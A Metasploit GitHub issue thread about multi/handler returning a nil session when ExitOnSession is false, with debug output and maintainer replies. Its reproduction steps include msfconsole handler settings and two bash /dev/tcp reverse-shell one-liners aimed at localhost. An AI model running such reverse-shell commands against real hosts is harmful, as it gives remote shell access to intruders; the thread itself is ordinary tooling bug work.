Open WangYihang opened 6 years ago
In addition:
After debug I notice that: only when ExitOnSession
be set to false
, the return value of function exploit_simple
(lib/msf/base/simple/exploit.rb:59
) will be nil
Debug log
[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:42402) at 2018-05-31 10:05:45 +0800
[*] Command shell session 3 opened (127.0.0.1:4444 -> 127.0.0.1:42404) at 2018-05-31 10:05:54 +0800
^C[-] Exploit failed: Interrupt
"[Debug]: Exploit finished! Session: "
From: /home/sun/Desktop/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb @ line 123 Msf::Ui::Console::CommandDispatcher::Exploit#cmd_exploit:
118: 'OptionStr' => opt_str,
119: 'LocalInput' => driver.input,
120: 'LocalOutput' => driver.output,
121: 'RunAsJob' => jobify)
122: p "[Debug]: Exploit finished! Session: #{session}"
=> 123: binding.pry
124: rescue ::Interrupt
125: raise $!
126: rescue ::Exception => e
127: print_error("Exploit exception (#{mod.refname}): #{e.class} #{e}")
128: if(e.class.to_s != 'Msf::OptionValidateError')
[1] pry(#<Msf::Ui::Console::CommandDispatcher::Exploit>)> session
=> nil
This module is not a real exploit, and as such, has no actual success criteria. But we could probably fake it.
thank you for reply~ I know that it not a real exploit, but actually the session created... so in my mind, the framework should tell user that N sessions created while listening the port~
Here is my thinking, I think we can just send a specific command (such as: echo '#{random_string}'
) which can run on multi platform (it seems like function: run_cmd_token), then if the client echo that string, we can find that the exploit is successful...
I am not sure it will works or not...
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Steps to reproduce
I found this problem while doing my work on GSoC project, I will try to fix this problem as possible as I can. Here are the steps to reproduce:
./msfconsole
use multi/handler
set payload cmd/unix/reverse_bash;
set LHOST 127.0.0.1;
set LPORT 4444;
set ExitOnSession false;
exploit
Open two terminal and creat two reverse shell session
bash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>&1'
bash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>&1'
Expected behavior
Current behavior
Difference between expected behavior and current behavior is marked by stars (
***********
)System stuff
Metasploit version
I installed Metasploit with:
OS
Ubuntu 18.10